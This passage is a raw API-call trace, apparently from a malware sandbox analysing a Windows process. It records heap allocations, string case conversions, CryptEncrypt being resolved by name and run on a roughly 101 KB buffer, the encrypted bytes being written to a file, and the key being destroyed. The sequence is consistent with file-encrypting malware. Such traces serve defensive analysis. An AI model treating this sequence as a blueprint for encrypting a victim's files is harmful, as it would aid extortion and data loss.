hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71be8 [0210.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.627] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0210.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0210.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0210.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0210.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73e00 | out: hHeap=0x2af0000) returned 1 [0210.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0210.628] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0210.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae88 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a73db8 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d38 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.629] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bf8 [0210.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73db8 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d38 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bc8 [0210.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7120 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7120 | out: hHeap=0x2af0000) returned 1 [0210.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cb8 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d68 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c18 [0210.631] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab020 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0210.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c38 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.631] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c38 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf18 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d68 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c78 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bc8 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x37f19e8 | out: hHeap=0x2af0000) returned 1 [0210.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d38 | out: hHeap=0x2af0000) returned 1 [0210.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab368 | out: hHeap=0x2af0000) returned 1 [0210.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0210.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d98 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab260 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0210.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0210.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0210.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3f8 | out: hHeap=0x2af0000) returned 1 [0210.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71be8 | out: hHeap=0x2af0000) returned 1 [0210.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab230, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.640] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x18cc1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x18cc8) returned 1 [0210.640] CharLowerBuffW (in: lpsz="byte[101576]", cchLength=0xc | out: lpsz="byte[101576]") returned 0xc [0210.644] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.644] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.646] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0210.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aab170, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0210.646] CryptEncrypt (in: hKey=0x9e2078, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x37f19e8*, pdwDataLen=0x8cef60*=0x18cc1, dwBufLen=0x18cc8 | out: pbData=0x37f19e8*, pdwDataLen=0x8cef60*=0x18cc8) returned 1 [0210.653] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.654] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.654] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.655] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.655] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.655] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.675] WriteFile (in: hFile=0x4dc, lpBuffer=0x37c0048*, nNumberOfBytesToWrite=0x18cc8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesWritten=0x8cf5e4*=0x18cc8, lpOverlapped=0x0) returned 1 [0210.677] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0210.677] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0210.677] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.677] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.677] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0210.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0210.677] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab080, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0210.677] CryptDestroyKey (hKey=0x9e2078) returned 1 [0210.677] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0210.677] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0210.677] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0210.677] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0210.678] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") 